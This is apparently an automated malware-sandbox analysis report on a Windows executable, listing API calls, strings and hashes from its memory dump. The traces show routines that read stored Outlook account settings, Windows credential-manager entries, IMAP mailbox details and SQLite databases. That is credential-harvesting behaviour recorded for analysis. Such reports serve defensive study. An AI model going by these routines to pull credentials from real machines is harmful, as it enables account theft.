                                                                                                                  • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                  • String ID: %s@gmail.com$www.google.com
                                                                                                                  • API String ID: 3866421160-4070641962
                                                                                                                  • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                  • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                  • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                  • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                  APIs
                                                                                                                  • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                  • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                    • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                    • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                    • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                  • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                  • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                  • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                  • memset.MSVCRT ref: 004097BD
                                                                                                                  • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                  • API String ID: 1035899707-3647959541
                                                                                                                  • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                  • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                  • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                  • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                  APIs
                                                                                                                  • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy
                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                  • API String ID: 714388716-318151290
                                                                                                                  • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                  • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                  • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                  • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                  APIs
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                  • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                    • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                    • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                    • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                  • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                  • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                  • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                  • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1416211542-0
                                                                                                                  • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                  • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                  • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                  • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                  • API String ID: 2360744853-2229823034
                                                                                                                  • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                  • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                  • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                  • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                  • memset.MSVCRT ref: 00402C9D
                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                  • memset.MSVCRT ref: 00402CF7
                                                                                                                  • sprintf.MSVCRT ref: 00402D10
                                                                                                                  • sprintf.MSVCRT ref: 00402D4E
                                                                                                                    • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                    • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Closememset$sprintf$EnumOpen
                                                                                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                  • API String ID: 1831126014-3814494228
                                                                                                                  • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                  • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                  • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                  • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                  APIs
                                                                                                                  • strchr.MSVCRT ref: 004100E4
                                                                                                                  • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                  • _mbscat.MSVCRT ref: 0041014D
                                                                                                                  • memset.MSVCRT ref: 00410129
                                                                                                                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                    • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                  • memset.MSVCRT ref: 00410171
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                  • _mbscat.MSVCRT ref: 00410197
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                  • String ID: \systemroot
                                                                                                                  • API String ID: 912701516-1821301763
                                                                                                                  • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                  • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                  • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                  • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                  APIs
                                                                                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                  Strings
                                                                                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                  • API String ID: 1640410171-2022683286
                                                                                                                  • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                  • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                  • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                  • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                  • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                  • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$strlen
                                                                                                                  • String ID: -journal$-wal$immutable$nolock
                                                                                                                  • API String ID: 2619041689-3408036318
                                                                                                                  • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                  • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                  • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                  • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A3E
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A4C
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A5D
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A74
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A7D
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,76270A60,?,00000000), ref: 00409C53
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,76270A60,?,00000000), ref: 00409C6F
                                                                                                                  • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,76270A60), ref: 00409C97
                                                                                                                  • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,76270A60), ref: 00409CB4
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,76270A60), ref: 00409D3D
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,76270A60), ref: 00409D47
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,76270A60), ref: 00409D7F
                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76270A60), ref: 00408EBE
                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408E31
                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                  • String ID: 0wE$`'v$`'v
                                                                                                                  • API String ID: 2915808112-3269934094
                                                                                                                  • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                  • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                  • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                  • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$strlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 667451143-3916222277
                                                                                                                  • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                  • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                  • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                  • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                  • wcslen.MSVCRT ref: 0040874A
                                                                                                                  • wcsncmp.MSVCRT ref: 00408794
                                                                                                                  • memset.MSVCRT ref: 0040882A
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                  • wcschr.MSVCRT ref: 0040889F
                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                  • String ID: J$Microsoft_WinInet
                                                                                                                  • API String ID: 3318079752-260894208
                                                                                                                  • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                  • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                  • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                  • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(comctl32.dll,76270A60,?,00000000,?,?,?,0040CF60,76270A60), ref: 00404AB8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76270A60), ref: 00404ADE
                                                                                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                  • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                  • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                  • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                  • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                                                                                  • strlen.MSVCRT ref: 00406CCC
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                                                                                                  • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                                                                                  • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                  • API String ID: 2881943006-572158859
                                                                                                                  • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                  • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                  • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                  • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                  • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                  • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                  • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                    • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                  • API String ID: 888011440-2039793938
                                                                                                                  • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                  • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                  • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                  • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                  • database is already attached, xrefs: 0042EA97
                                                                                                                  • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                  • database %s is already in use, xrefs: 0042E9CE
                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                  • out of memory, xrefs: 0042EBEF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
